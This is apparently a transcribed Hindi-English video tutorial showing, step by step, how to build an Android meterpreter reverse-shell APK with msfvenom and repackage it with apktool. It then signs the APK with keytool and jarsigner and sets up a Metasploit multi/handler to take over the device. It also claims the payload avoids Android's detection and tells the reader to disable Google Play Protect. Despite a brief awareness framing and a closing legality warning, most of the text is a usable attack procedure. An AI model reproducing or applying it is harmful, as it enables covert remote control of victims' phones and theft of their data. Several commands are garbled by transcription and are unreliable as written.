एज़ वी ऑल नो कि हमारी जो एंड्रॉयड सिक्योरिटी है वो कितनी ज़्यादा इंपॉर्टेंट है, बट हैकर्स यहाँ पे डिफरेंट वेज ढूंढते हैं, डिफरेंट एपीकेस को बिल्ड करते हैं एडवांस लेवल पे, ताकि वो हमारी एंड्रॉयड सिक्योरिटी को बाईपास कर सकें एंड हमारे एंड्रॉयड डिवाइसेस का एक्सेस ले सकें। सो इन्हीं सब चीज़ों को आज की इस वीडियो में मैं आपको प्रैक्टिकली करके दिखाऊंगा इन अवर काली लिनक्स ऑपरेटिंग सिस्टम, ताकि आप अंडरस्टैंड कर सकें कि हैकर्स आपके सिस्टम को कैसे हैक करते हैं। यहाँ पे मैं टर्मिनल को ओपन कर लूँगा एंड यहाँ पे फर्स्ट ऑफ ऑल हम अपने सिस्टम को अपडेट कर लेंगे। sudo apt अपडेट एंड देन पासवर्ड एंड एंटर। अपडेट करने से जितने भी लेटेस्ट पैकेट्स हैं वो यहाँ पे इंस्टॉल हो जाएंगे। अब यहाँ पे इसको हम अपग्रेड कर लेंगे, अपग्रेड /y। हमारा सिस्टम यहाँ पे अपडेट भी हो गया एंड अपग्रेड भी हो गया। नाउ अब हम जनरेट करेंगे मलेशियस पेलोड को। उसके लिए यहाँ पे हमें कमांड डालेंगे msf venom /p android /meterpredator /reverse tcp एंड यहाँ पे एलोस्ट सेलेक्ट कर लेंगे। हमारा जो काली लिनक्स सिस्टम का आईपी एड्रेस होगा वो हमारे यहाँ पे एलहोस्ट होगा। हम यहाँ पे एक टर्मिनल ओपन करेंगे एंड यहाँ पे ifconfig ईथरनेट 0 पे यहाँ पे आईपी एड्रेस आ जाएगा। यहाँ से इसे कॉपी कर लेंगे एंड यहाँ पे पेस्ट कर देंगे। नाउ अब हम यहाँ पे एल पोर्ट सेलेक्ट करेंगे। हम यहाँ पे एल पोर्ट को डिफ़ॉल्ट रखेंगे 444 एंड 4/0 एंड यहाँ पे प्लेस सेलेक्ट करेंगे जहाँ पे हमारी ये एपीके फाइल सेव होगी /tmp/evil.apk। ये मैंने इस फाइल का नाम रखा है, आप अपने अकॉर्डिंग इस फाइल का नाम चेंज भी कर सकते हैं। यहाँ पे इस कमांड को एंटर कर देंगे। सो एज वी कैन सी हमारी यहाँ पे फाइल क्रिएट हो गई है एंड इसकी यहाँ पे बिट साइज भी शो हो रहा है। हम यहाँ पे देख लेंगे, इसे हम बैक करेंगे एंड होम पे आ जाएंगे। यहाँ पे कंप्यूटर पे फाइल सिस्टम एंड देन टीएमपी फोल्डर पे। सो एज यू कैन सी हमारी यहाँ पे फाइल क्रिएट हो चुकी है। अगेन यहाँ पे हम टर्मिनल पे आ जाएंगे एंड अब हम इसी एपीके फाइल को और ज़्यादा सस्पिशियस बनाएंगे। यहाँ पे हम एक टूल का यूज़ करेंगे। फर्स्ट ऑफ ऑल हम उसे इंस्टॉल कर लेंगे, sudo apt install apk tool and then enter। नाउ आफ्टर दैट हम यहाँ पे अपनी एपीके को डीकम्पाइल करेंगे ताकि हम इसमें मॉडिफिकेशन को परफॉर्म कर सकें। उसके लिए यहाँ पे हम कमांड डालेंगे apk tool d एंड हमारी फाइल की लोकेशन जहाँ पे हमने फाइल सेव की है टेम्प फोल्डर के अंदर एंड यहाँ पे फाइल का नाम .apk/o एंड हम सेम लोकेशन का यूज़ करेंगे /evil/ यहाँ पे मैंने अपनी फाइल की लोकेशन डाल दिया एंड डीकम्पाइल होने के बाद इस फोल्डर में जाके ये सारा डेटा सेव होगा। इसे यहाँ पे हम एंटर कर लेंगे। एंड एज यू कैन सी हमारी यहाँ पे जो एपीके है वो डीकम्पाइल हो चुकी है। अब हम इसमें आराम से मॉडिफिकेशन को परफॉर्म कर सकते हैं। नाउ अगेन हम इसको रीबिल्ड करेंगे apk tool b। अगेन यहाँ पे फोल्डर का नाम tmp फोल्डर में है एंड देन evil/decoded। ये वाला फोल्डर पे हमारी सारी फाइल सेव हुई थी एंड हमें यहाँ पे सेम इसी फोल्डर को यहाँ पे रिप्रेजेंट करना है /o एंड यहाँ पे सेम लोकेशन का यूज़ करना है /evil/modify.apk। यहाँ पे मैंने अपनी एपीके फाइल का नेम चेंज किया क्योंकि हम इस फाइल को मॉडिफाई कर रहे हैं यहाँ पे। सो इसे एंटर करेंगे एंड हमारा जो एपीके है वो सक्सेसफुली यहाँ पे रीबिल्ड हो जाएगा। हम सेम फोल्डर के अंदर जाएंगे एंड एज यू कैन सी यहाँ पे आपको डिकोडेड वाली यहाँ पे फोल्डर मिलेगा एंड यहाँ पे आपको फाइल मिल जाएगी एंड जो आपकी मॉडिफाइड फाइल है वो भी आपको यहाँ पे मिल जाएगी। अगेन यहाँ पे टर्मिनल पे आएंगे। हमारी फाइल यहाँ पे बन चुकी है। अब हमें यहाँ पे की को जनरेट करना है लाइक प्राइवेट की। उसके लिए यहाँ पे हम कमांड डालेंगे की टूल स्लैश जेन की स्लैश वी
स्लैश की स्टोर, यहाँ पे हमारी की का नाम होगा माई स्लैश रिलीज स्लैश की डॉट की स्टोर स्लैश एलिस। स्लैश नेम, यहाँ पे हम RS एल्गोरिथम का यूज़ करेंगे एंड यहाँ पे की साइज अपना दे देंगे। मैं यहाँ पे लेटेस्ट की साइज दे रहा हूँ 2048 बिट्स। RSA की जो एल्गोरिथम है उसमें जो लेटेस्ट अभी की साइज चल रहा है वो 2048 बिट्स ही है। सो मैंने यहाँ पे की साइज दे लिया। अब मैं यहाँ पे इसकी वैलिडिटी दूंगा स्लैश $10,000। इस पूरी कमांड को आपको रन कर देना है एंड यहाँ पे आपको अपना पासवर्ड एंटर करना है जो कि आपको डिफ़ॉल्ट पासवर्ड रखना है अपनी की के लिए। लाइक यहाँ पे मैं एंटर करूँगा 1 2 3 4 5 6 बेसिक सा। आप यहाँ पे अपने अकॉर्डिंग कोई भी पासवर्ड सेलेक्ट कर सकते हैं। मुझे पासवर्ड को री एंटर करना है। अब मुझे यहाँ पे फर्स्ट नेम एंड लास्ट नेम का लेटर डालना है एन ऑर्गेनाइजेशन का यूनिट। यहाँ पे आप कोई भी ऑर्गेनाइजेशन का यूनिट डाल सकते हो। रेड टीम। अब नेम ऑफ द ऑर्गेनाइजेशन आप यहाँ पे कोई भी नेम डाल सकते हो। सिक्योरिटी है लाइक नेम ऑफ द सिटी। एज यूजुअल आप यहाँ पे कोई भी सिटी डाल सकते हो। नेम ऑफ द स्टेट, कोई भी स्टेट। इन सभी इंफॉर्मेशन को डालने के बाद आपको यहाँ पे यस टाइप करना है एंड देन एंटर कर देना है। आपकी जो RSA की है वो यहाँ पे जनरेट हो जाएगी। लेट मी शो यू। हम यहाँ पे होम पेज पे आएंगे एंड एज यू कैन सी दैट यहाँ पे हमारी की जनरेट हो चुकी है। नाउ हमने यहाँ पे अपनी APK के साथ मॉडिफिकेशन भी परफॉर्म कर लिया है एंड अपनी की स्टॉक को भी जनरेट कर लिया है। अब यहाँ पे हम स्ट्रॉन्गेस्ट एल्गोरिथम का यूज़ करेंगे लाइक SHA 256 और SHA 384 ताकि हमारी जो APK है एंड जो की है वो साइन इन हो जाए। सो उसके लिए यहाँ पे हम कमांड डालेंगे जार शाइनर स्लैश वर्बोस स्लैश SHA 256 with RSA slash digest algorithm SHA 256 slash की स्टोर एंड यहाँ पे जो हमारी की का नाम है वो हम यहाँ पे डाल देंगे माई स्लैश रिलीज स्लैश की डॉट की स्टोर। हम यहाँ पे फोल्डर का नाम डालेंगे जहाँ पे हमारी मॉडिफाइड APK फाइल सेव है। यहाँ पे फाइल का नाम आएगा evil स्लैश modify.apk स्लैश नेम। इस कमांड को आपको वीडियो को पॉज करके नोट डाउन कर लेना है एंड यहाँ पे इसको एंटर करना है। यहाँ पे जो आपका की स्टोर है जो आपने यहाँ पे सेलेक्ट किया था उसको यहाँ पे आपको एंटर करना है। लाइक मेरा वाला था 1 2 3 4 5 6 1 2 3 4 5 6 एंड देन एंटर। सो एज यू कैन सी हमारी यहाँ पे जो APK है वो प्रॉपरली यहाँ पे सक्सेसफुली साइन इन हो चुकी है एंड यहाँ पे हमने इसमें लेटेस्ट एल्गोरिथम्स का यूज़ किया। आप यहाँ पे देख सकते हैं SHA 384 विद RSA एंड यहाँ पे बिट साइज भी आपको शो हो रहा है। नाउ हमारा जो APK सिग्नेचर है उसे यहाँ पे हम वेरीफाई कर लेंगे। उसके लिए यहाँ पे हम कमांड डालेंगे जार शाइनर स्लैश वेरीफाई स्लैश
verbose/carts एंड यहाँ पे हमारी APK फाइल का नेम हमने यहाँ पे इसका फोल्डर डाल दिया एंड हमारी जो मॉडिफाइड APK फाइल है जिसको हमने यहाँ पे साइन इन किया उसका यहाँ पे नेम डालेंगे एंड देन एंटर करेंगे। सो एज यू कैन सी यहाँ पे वेरिफिकेशन भी कंप्लीट हो चुकी है, जार हमारा वेरीफाइड आ रहा है, मीन्स हमारी जो APK है वो प्रॉपरली वर्क करेगी। नाउ यहाँ पे मैं फोल्डर पे आऊँगा अगेन, होम पेज पे, कंप्यूटर पे एंड फाइल सिस्टम पे, यहाँ पे TMP फोल्डर पे हमारी ये फाइल एकदम रेडी है, .apk फाइल evil/modify.apk फाइल। अब यहाँ पे आपको इस फाइल को किसी भी डमी एंड्रॉयड डिवाइस में आपको ट्रांसफ़र करना है। देन ट्रांसफ़र करने के बाद हम यहाँ पे अपने अटैक को एक्टिव कर लेंगे। उसके बाद यहाँ पे आपको कमांड लिखनी है, हम यहाँ पे मेटास्प्लॉइट फ्रेमवर्क का यूज़ करेंगे, MSF कंसोल एंटर। यहाँ पे मेटास्प्लॉइट का फ्रेमवर्क ओपन हो चुका है। अब यहाँ पे हम कमांड लिखेंगे यूज़ एक्सप्लॉइट स्लैश मल्टी स्लैश हैंडलर एंड देन एंटर। एज यू कैन सी हम यहाँ पे एक्सप्लॉइट के अंदर मल्टी स्लैश हैंडलर के अंदर आ चुके हैं। अब यहाँ पे हमें पेलोड को सिलेक्ट कर लेना है जो कि हमने बनाया था। सेट पेलोड एंड्रॉयड बीटअपरेटर स्लैश रिवर्स TCP एंड देन एंटर। एज यू कैन सी हमारे यहाँ पे पेलोड भी सिलेक्ट हो चुका है। अब यहाँ पे हमने lhost को सिलेक्ट करना है, सेट lhost। हमने यहाँ पे IP एड्रेस निकाला था, हम अगेन इसको कॉपी कर लेंगे एंड यहाँ पे आके पेस्ट कर देंगे। हमारे यहाँ पे lhost भी सिलेक्ट हो जाएगा। अब हमें L पोर्ट को यहाँ पे सिलेक्ट करना है, सेट L पोर्ट 444 एंड 4 एंड देन एंटर। हमारी यहाँ पे सब चीज़ें सिलेक्ट हो चुकी हैं। अब हमें सिंपली यहाँ पे एक्सप्लॉइट पे क्लिक करना है एंड देन जिस भी डमी एंड्रॉयड डिवाइस में आपने वो APK को सेंड किया है आपको वहाँ पे उसको इंस्टॉल कर लेना है एंड जो एंड्रॉयड डिवाइस का सिक्योरिटी सिस्टम होगा वो उसे डिटेक्ट नहीं कर पाएगा। आपको यहाँ पे कोई भी वायरस की नोटिफिकेशन नहीं आएगी, कोई भी कनेक्शन ब्रेक नहीं होगा। बस वहाँ पे आपको गूगल प्ले स्टोर में से जाके सिक्योरिटी को ऑफ करना है जो कि गूगल की सिक्योरिटी होती है, बिकॉज एज यू नो कि गूगल की सिक्योरिटी एडवांस होती है, वो इस चीज़ को डिटेक्ट कर लेगी। बट जो एंड्रॉयड की सिक्योरिटी होगी वहाँ पे ये डिटेक्शन पॉसिबल नहीं हो पाएगा बिकॉज हमने यहाँ पे अपने APK को मॉडिफाई कर दिया है। लेट मी टेल यू सम एडिशनल टिप। जब आप इस APK को अपने डमी एंड्रॉयड डिवाइस में इंस्टॉल करोगे देन वहाँ पे आपको लेटेस्ट एंड्रॉयड डिवाइस का यूज़ करना है, लाइक एंड्रॉयड 14, एंड्रॉयड 15 एंड एंड्रॉयड 16। ओल्ड डिवाइसेस में ये टेक्निक वर्क नहीं करेगी बिकॉज हमने यहाँ पे लेटेस्ट RSA 256 का यूज़ किया, दैट्स वाई। एंड एडिशनली आपको यहाँ पे गूगल प्ले सर्विसेज उसको आपको यहाँ पे ऑफ रखना है बिकॉज जो गूगल की सिक्योरिटी होती है वो इसको यहाँ पे डिटेक्ट कर लेगी, बट आपकी एंड्रॉयड सिक्योरिटी यहाँ पे इसको डिटेक्ट नहीं कर पाएगी। सो इस तरह से हैकर्स हमारे एंड्रॉयड डिवाइस को हैक करते हैं एंड हमारे एंड्रॉयड डिवाइस का फुली एक्सेस लेते हैं अपने लैपटॉप पे। So that's why you need to be aware from these type of APKs. And at last, I must say that never try this on someone's Android device. It is purely illegal.